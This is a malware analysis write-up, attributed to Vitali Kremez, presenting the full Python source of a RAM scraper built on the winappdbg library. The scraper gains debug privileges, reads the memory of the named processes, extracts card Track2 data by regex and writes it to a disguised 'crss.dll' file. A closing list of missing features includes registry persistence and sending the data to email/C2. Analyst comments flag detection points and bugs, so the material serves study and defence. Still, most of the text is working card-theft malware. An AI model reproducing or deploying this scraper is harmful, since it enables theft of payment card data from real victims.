Malware Analysis: Dump Scraper Implementation in Python Using winappdbg, getpass, re, sys Method of Operation of Scanning explorer.exe for Dump Data: (1) Show the Windows version and the current architecture (from winappdbg (System.os, System.arch, System.bits)) (2) Create a snapshot of running processes (from winappdbg.System (request_debug_privileges(), scan_processes())) (3) Obtain local username (from getpass.getuser()) (4) Create a writable file in Application Data Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+') (5) Obtain all processes that match the requested filenames. # Elevate privileges system.request_debug_privileges() system.scan_processes() for process, filename in system.find_processes_by_filename("explorer.exe"): pid = process.get_pid() bits = process.get_bits() print pid, bits (6) Get a memory map of the process. memoryMap = process.get_memory_map() mappedFilenames = process.get_mapped_filenames(memoryMap) (7) For each memory block in the map, read the address and size of the memory block, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type (8) Read the data from memory if mbi.has_content() and mbi.State == win32.MEM_COMMIT Data = process.read(BaseAddress, RegionSize) (9) Implement a simple Regular Expression looking for Track2 data Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data) Dump_Data.append(Dump_Regex) (10) Beautify the extracted dump data (11) Write dump data into crss.dll Missing features are as follows: (1) Add Registry Persistence (2) Encode Saved Data (3) Add Luhn Algorithm (4) Create a process for this algorithm (5) Send data to email/C2 import sys
# Analyst's note: this sample is a memory ("RAM") scraper built on the
# winappdbg debugger library.  It enumerates the processes named on the
# command line, reads every committed region of their address space, and
# writes anything matching a track-data pattern to a text file in the
# user's roaming profile.  Everything below the imports runs at module
# level, in this order, with no error handling anywhere.
import winappdbg
from winappdbg import System, win32
import re
import getpass

# Show the Windows version and the current architecture.
# System.os / System.arch / System.bits / System.wow64 are winappdbg
# attributes describing the host, not the target process.
print "Running on %s for the %s architecture." % (System.os, System.arch)
if System.wow64:
    print "Running in 32 bit emulation mode."
print "From this Python VM we can attach to %d-bit processes." % System.bits

# Create a snapshot of running processes.
# request_debug_privileges() enables the debug privilege on this process so
# that it can open processes it does not own; scan_processes() builds the
# snapshot that find_processes_by_filename() searches below.
# Detection: a script interpreter enabling SeDebugPrivilege and then opening
# explorer.exe (or a payment application) for read is a high-signal EDR /
# token-privilege-audit event, and it happens before any data is touched.
system = winappdbg.System()
system.request_debug_privileges()
system.scan_processes()

UserName = getpass.getuser()

# if win64 is active, follows the following filesystem convention
# Dump_Writer = open('C:\\Users\\'+UserName+'\\AppData\\Roaming\\athena.dll', 'w+')
# Output artifact: a plain-text file under the XP-era roaming-profile path,
# given a name that resembles a system binary (presumably csrss).  'w+'
# truncates it on every run.  Despite the ".dll" extension it is text, not
# a PE image -- a content/extension mismatch that file-hunting rules can
# key on, and a path that does not exist on Vista and later (see the
# commented-out alternative above).
Dump_Writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\\\crss.dll', 'w+')
# One entry per committed region read: the list of regex matches in it
# (usually an empty list).
Dump_Data = []

# Get all processes that match the requested filenames.
# Target image names come from argv, so process command-line logging
# records exactly which process the scraper was pointed at.
for filename in sys.argv[1:]:
    print "Looking for: %s" % filename
    for process, pathname in system.find_processes_by_filename(filename):
        pid = process.get_pid()
        bits = process.get_bits()
        print "Dumping memory for process ID %d (%d bits)" % (pid, bits)

        # Get a memory map of the process.
        memoryMap = process.get_memory_map()
        mappedFilenames = process.get_mapped_filenames(memoryMap)

        # For each memory block in the map...
        for mbi in memoryMap:
            # Address and size of memory block.
            BaseAddress = mbi.BaseAddress
            RegionSize = mbi.RegionSize

            # State (free or allocated).
            # NOTE(analysis): State, Protect, Type and FileName below are
            # computed but never used; they appear to be carried over from
            # winappdbg's memory-map example.  Only the MEM_COMMIT test in
            # the read branch further down affects behaviour.
            if mbi.State == win32.MEM_RESERVE:
                State = "Reserved"
            elif mbi.State == win32.MEM_COMMIT:
                State = "Commited"
            elif mbi.State == win32.MEM_FREE:
                State = "Free"
            else:
                State = "Unknown"

            # Page protection bits (R/W/X/G).
            if mbi.State != win32.MEM_COMMIT:
                Protect = ""
            else:
                if mbi.Protect & win32.PAGE_NOACCESS:
                    Protect = "--- "
                elif mbi.Protect & win32.PAGE_READONLY:
                    Protect = "R-- "
                elif mbi.Protect & win32.PAGE_READWRITE:
                    Protect = "RW- "
                elif mbi.Protect & win32.PAGE_WRITECOPY:
                    Protect = "RC- "
                elif mbi.Protect & win32.PAGE_EXECUTE:
                    Protect = "--X "
                elif mbi.Protect & win32.PAGE_EXECUTE_READ:
                    Protect = "R-X "
                elif mbi.Protect & win32.PAGE_EXECUTE_READWRITE:
                    Protect = "RWX "
                elif mbi.Protect & win32.PAGE_EXECUTE_WRITECOPY:
                    Protect = "RCX "
                else:
                    Protect = "??? "
                if mbi.Protect & win32.PAGE_GUARD:
                    Protect += "G"
                else:
                    Protect += "-"
                if mbi.Protect & win32.PAGE_NOCACHE:
                    Protect += "N"
                else:
                    Protect += "-"
                if mbi.Protect & win32.PAGE_WRITECOMBINE:
                    Protect += "W"
                else:
                    Protect += "-"

            # Type (file mapping, executable image, or private memory).
            if mbi.Type == win32.MEM_IMAGE:
                Type = "Image"
            elif mbi.Type == win32.MEM_MAPPED:
                Type = "Mapped"
            elif mbi.Type == win32.MEM_PRIVATE:
                Type = "Private"
            elif mbi.Type == 0:
                Type = ""
            else:
                Type = "Unknown"

            # Mapped file name, if any.
            FileName = mappedFilenames.get(BaseAddress, None)

            # Read the data contained in the memory block, if any.
            # Every committed region is read in full, regardless of the
            # protection computed above; no exception is caught, so a
            # region that cannot be read presumably aborts the whole run
            # (depends on how winappdbg reports a failed read -- confirm).
            # Detection: this is the cross-process memory-read activity
            # (ReadProcessMemory against the target) that memory-access
            # telemetry sees.
            Data = None
            if mbi.has_content() and mbi.State == win32.MEM_COMMIT:
                ## print 'Reading %s-%s' % (
                ##     winappdbg.HexDump.address(BaseAddress, bits),
                ##     winappdbg.HexDump.address(BaseAddress + RegionSize, bits)
                ## )
                Data = process.read(BaseAddress, RegionSize)
                # Pattern for track data, applied to the raw region bytes.
                # Anything captured here is clear-text cardholder data, so
                # both this process's memory and the output file are
                # evidence (and in PCI DSS scope) during incident response.
                Dump_Regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', Data)
                Dump_Data.append(Dump_Regex)

# Post-processing: reduce the per-region match lists to their unique
# string forms.  The pop(0) discards the first unique entry (normally the
# "[]" produced by regions with no hits), and only Clean_Dump[0] of what
# remains is written -- later entries are dropped.  If nothing matched at
# all, or no target process was found, the pop/index raises IndexError and
# the (already truncated) output file is left empty.
Clean_Dump = []
for i in Dump_Data:
    i = str(i)
    if str(i) not in Clean_Dump:
        Clean_Dump.append(str(i))
Clean_Dump.pop(0)
i = str(Clean_Dump[0])
# Strip the Python list syntax (brackets, quotes, whitespace) from the
# stringified match list, then split it into individual matches.
line = re.sub('\[', '', i)
line1 = re.sub('\]', '', line)
line2 = re.sub('\'', '', line1)
line3 = re.sub('\s', '', line2)
g = line3.split(',')
g = set(g)
# Write one match per line.  `i not in Dump_Writer` tests membership in
# the file *object* (Python 2 iterates its remaining lines), not in its
# contents; at the current write position it presumably yields nothing,
# so the test is effectively always true and set() above is the only
# de-duplication.  Output is clear text -- the write-up's own "Encode
# Saved Data" item is not implemented -- so the file is directly readable
# by responders and by DLP scanning.
for i in g:
    if i not in Dump_Writer:
        Dump_Writer.write(i + "\n")
print "Done."
Dump_Writer.close()
# Unused setup() stub, kept inside a module-level string literal (a no-op
# expression statement).  Note that `packages` is a single string, not a
# list of package names, so it would not work as a distutils manifest.
'''
from distutils.core import setup
setup(
    name='ramscraper',
    version='1.0',
    packages=['sys, winappdbg, re, getpass'],
    url='http://www.vkremez.com',
    license='Apache License, Version 2.0',
    author='Administrator',
    author_email='vitali@vkremez.com',
    description='Memory Scraper Emulation'
)
'''
Author: Vitali Kremez